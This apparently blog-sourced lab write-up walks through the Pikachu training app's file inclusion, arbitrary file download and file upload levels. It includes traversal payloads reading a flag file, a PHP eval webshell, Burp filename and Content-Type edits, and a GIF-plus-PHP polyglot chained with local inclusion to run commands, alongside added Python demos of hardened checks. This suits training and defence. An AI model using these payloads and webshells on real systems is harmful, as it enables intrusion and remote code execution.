Pikachu: file inclusion, file upload, file download

First, file inclusion
1. File Inclusion (local)
First test: select kobe and submit.
Notice that the URL changes.
The flag file in the root directory can be read, so there is a local file inclusion vulnerability.
2. File Inclusion (remote)
As above, select kobe and submit; the URL changes again.
So build a URL to include; I chose my blog address https://www.cnblogs.com/p201721440034
The following result was returned:

So remote file inclusion succeeded.
Second, file download
Opening the page, the hint says to click a link to download the picture.

Copy one of the download links:

http://172.16.124.129/pikachu/vul/unsafedownload/execdownload.php?filename=lmx.png

The download is not a direct link to the file; the picture is fetched through the filename request parameter.

So build the usual traversal payload:

http://172.16.124.129/pikachu/vul/unsafedownload/execdownload.php?filename=../../../../../../../../flag

Visiting this link starts a download of the flag file, so an arbitrary file download vulnerability exists.
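The local inclusion, remote inclusion and download levels above share one root cause: the filename parameter is joined to a base path and used as-is. The following is an added example (not pikachu's PHP) that models that join, reads a flag out of a constructed sandbox directory with the same ../ payload, and shows the resolve-then-compare check that closes all three bypasses. The directory layout, file names and flag contents are constructed for the demo.

```python
"""User-controlled filename resolution: the flaw behind fi_local.php and
execdownload.php, and the check that closes it.

Added example, not pikachu's code. It builds a throwaway directory tree
(a base directory with lmx.png, a flag one level above it, and a sibling
directory whose name shares the base's prefix) so the checks run offline.
"""
import os
import tempfile
from urllib.parse import urlparse

# Constructed sandbox standing in for the web root.
ROOT = os.path.realpath(tempfile.mkdtemp())
BASE = os.path.join(ROOT, "www", "uploads")          # files meant to be served
os.makedirs(BASE)
os.makedirs(os.path.join(ROOT, "www", "uploads_evil"))
with open(os.path.join(BASE, "lmx.png"), "wb") as f:
    f.write(b"\x89PNG\r\n\x1a\n")
with open(os.path.join(ROOT, "flag"), "w") as f:
    f.write("flag{constructed}")
with open(os.path.join(ROOT, "www", "uploads_evil", "x.txt"), "w") as f:
    f.write("outside base")


def vulnerable_path(filename: str) -> str:
    """What the lab does: join the parameter to the base path and use it.
    '../' walks out of BASE; in PHP the same raw parameter is what
    include() receives, so an http:// value becomes remote inclusion."""
    return os.path.normpath(os.path.join(BASE, filename))


def vulnerable_read(filename: str) -> bytes:
    """The download handler: open whatever the join produced."""
    with open(vulnerable_path(filename), "rb") as f:
        return f.read()


def safe_path(filename: str):
    """Return the resolved path only if it is a regular file inside BASE.

    Three separate checks, each defeating one bypass from the write-up:
    - a URL scheme (http://, php://, data:) is remote inclusion: reject it;
    - realpath() collapses '..' and symlinks before the comparison;
    - commonpath() is used rather than startswith(), so that
      /www/uploads_evil does not pass as a child of /www/uploads.
    """
    if urlparse(filename).scheme:
        return None
    candidate = os.path.realpath(os.path.join(BASE, filename))
    try:
        if os.path.commonpath([BASE, candidate]) != BASE:
            return None
    except ValueError:          # different drives on Windows: not inside BASE
        return None
    return candidate if os.path.isfile(candidate) else None


if __name__ == "__main__":
    print("traversal reads:", vulnerable_read("../../flag"))
    for name in ("lmx.png", "../../flag", "../uploads_evil/x.txt",
                 "https://www.cnblogs.com/p201721440034", "php://filter/resource=x"):
        print(f"{name!r:45} -> {safe_path(name)}")
```

An allowlist of permitted filenames (or an integer id mapped to a path server-side) is stricter still and is the right fix for an include(); the realpath/commonpath check is the minimum for a download handler that must accept arbitrary names within one directory.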

Third, file upload

1. Client check

First determine whether the validation is done in the front end or the back end, using the browser's inspect-element tool.

The front-end JS check code obtained:

    function checkFileExt(filename)
    {
        var flag = false; // state
        var arr = ["jpg","png","gif"];
        // take the extension of the uploaded file
        var index = filename.lastIndexOf(".");
        var ext = filename.substr(index+1);
        // compare
        for(var i=0;i<arr.length;i++)
        {
            if(ext == arr[i])
            {
                flag = true; // once a match is found, leave the loop immediately
                break;
            }
        }
        // decide
        if(!flag)
        {
            alert("上传的文件不符合要求,请重新选择!");
            location.reload(true);
        }
    }

So this upload filter runs only in the browser and can be bypassed by editing the request in Burp. First choose a PHP one-liner webshell saved with a .gif extension.

Click upload and intercept the request with Burp.

Change filename to 111.php and click Forward.

The upload succeeds; the path is uploads/111.php

So we build a payload that executes a command directly:

http://172.16.124.129/pikachu/vul/unsafeupload/uploads/111.php?a=whoami

2. MIME type

As above, but this time inspecting the elements shows no front-end validation. Testing shows that only image files are accepted, but the filename itself is not checked.

Click upload and intercept the request.

// Only the Content-Type: field of the multipart part is checked to determine the file type
// Changing the filename is enough
Content-Disposition: form-data; name="uploadfile"; filename="S4tan.php"
Content-Type: image/jpeg

The PHP file uploads successfully.

The upload path is

http://172.16.124.129/pikachu/vul/unsafeupload/uploads/a123.php

As above, the payload is

http://172.16.124.129/pikachu/vul/unsafeupload/uploads/a123.php?a=whoami

3. getimagesize

As above, there is no front-end validation, so submit the one-liner to test.

The server reports that the file is not a real image. From the name of this level, the upload filter relies on getimagesize(), which parses the image header rather than the file size, so append the one-liner webshell to the end of a real picture.

This produces an image webshell, but the server renames the uploaded file, so to get it parsed as PHP we have to include it through the file inclusion vulnerability from earlier.

Using the earlier file inclusion payload to include the image webshell, construct the payload

http://172.16.124.129/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2019/12/19/8653725dfb71073ffa8429484095.jpg&submit=%E6%8F%90%E4%BA%A4

Execute whoami.

It executes successfully.
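The three upload levels each trust a different piece of attacker-controlled data: the filename (checked only in the browser), the multipart Content-Type header, and the first bytes of the body. The following is an added example, not pikachu's PHP, that models each check as a small function, shows the request that slips past it, builds the GIF-plus-PHP image webshell used in the last step, and contrasts a hardened check. The PHP one-liner, the file names and the image bytes are constructed for the demo.

```python
"""The three pikachu upload checks, the bypass each allows, and a hardened check.

Added example, not the lab's PHP: every function below is a small model of
one level's logic. File names, bytes and the PHP one-liner are constructed
for the demo; nothing here touches a real server.
"""
import secrets
import struct
from dataclasses import dataclass

PAYLOAD = b"<?php @eval($_GET['a']); ?>"      # one-liner webshell, as in the post
ALLOWED_EXT = {"jpg", "png", "gif"}


@dataclass
class Upload:
    filename: str       # value of the multipart filename="..." attribute
    content_type: str   # value of the part's Content-Type header
    data: bytes         # file body


def extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def build_image_shell(width: int = 1, height: int = 1) -> bytes:
    """Minimal GIF89a header followed by the payload: the 'image webshell'
    of level 3. Header parsers see a GIF; a PHP include() runs the tail."""
    return (b"GIF89a" + struct.pack("<HH", width, height) + b"\x00\x00\x00"
            + PAYLOAD)


def image_kind(data: bytes):
    """What getimagesize() would report from the header bytes, or None.
    It reads signatures and dimensions, never the file size."""
    if data[:6] in (b"GIF87a", b"GIF89a") and len(data) >= 10:
        w, h = struct.unpack("<HH", data[6:10])
        return "gif" if w and h else None
    if data[:8] == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR":
        return "png"
    if data[:3] == b"\xff\xd8\xff":
        return "jpg"
    return None


# Level 1: checkFileExt() runs in the browser. The server stores whatever
# filename arrives, so once Burp rewrites it there is no check at all.
def client_check(filename: str) -> bool:
    return extension(filename) in ALLOWED_EXT


def level1_server(up: Upload):
    return up.filename                       # stored as-is


# Level 2: only the part's Content-Type header is consulted; the client
# writes that header, so "image/jpeg" on a .php body passes.
def level2_server(up: Upload):
    if up.content_type in {"image/jpeg", "image/png", "image/gif"}:
        return up.filename
    return None


# Level 3: getimagesize() on the body, then a random name (extension kept).
def level3_server(up: Upload):
    if image_kind(up.data) is None:
        return None
    return f"{secrets.token_hex(12)}.{extension(up.filename)}"


def hardened_server(up: Upload):
    """Allowlist the extension, require the bytes to be an image, and require
    the two to agree; store under a random name. This still accepts the GIF
    polyglot (it *is* a GIF), so the upload directory must also be served
    with PHP execution disabled and never be passed to include()."""
    ext = extension(up.filename)
    kind = image_kind(up.data)
    if ext not in ALLOWED_EXT or kind is None or kind != ext:
        return None
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    shell = build_image_shell()
    print("level1 stores:", level1_server(Upload("111.php", "application/octet-stream", PAYLOAD)))
    print("level2 stores:", level2_server(Upload("S4tan.php", "image/jpeg", PAYLOAD)))
    print("level3 raw php:", level3_server(Upload("shell.php", "image/jpeg", PAYLOAD)))
    print("level3 image shell:", level3_server(Upload("shell.gif", "image/gif", shell)))
    print("hardened image shell:", hardened_server(Upload("shell.gif", "image/gif", shell)))
```

The last line is the point of step 3: no content check can reject the polyglot without rejecting real GIFs, which is why the write-up needs the inclusion bug to execute it. Closing the upload levels alone leaves that chain open; the include() side must stop accepting user-controlled paths, and the upload directory must not be executable.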


Source: www.cnblogs.com/P201721440034/p/12070076.html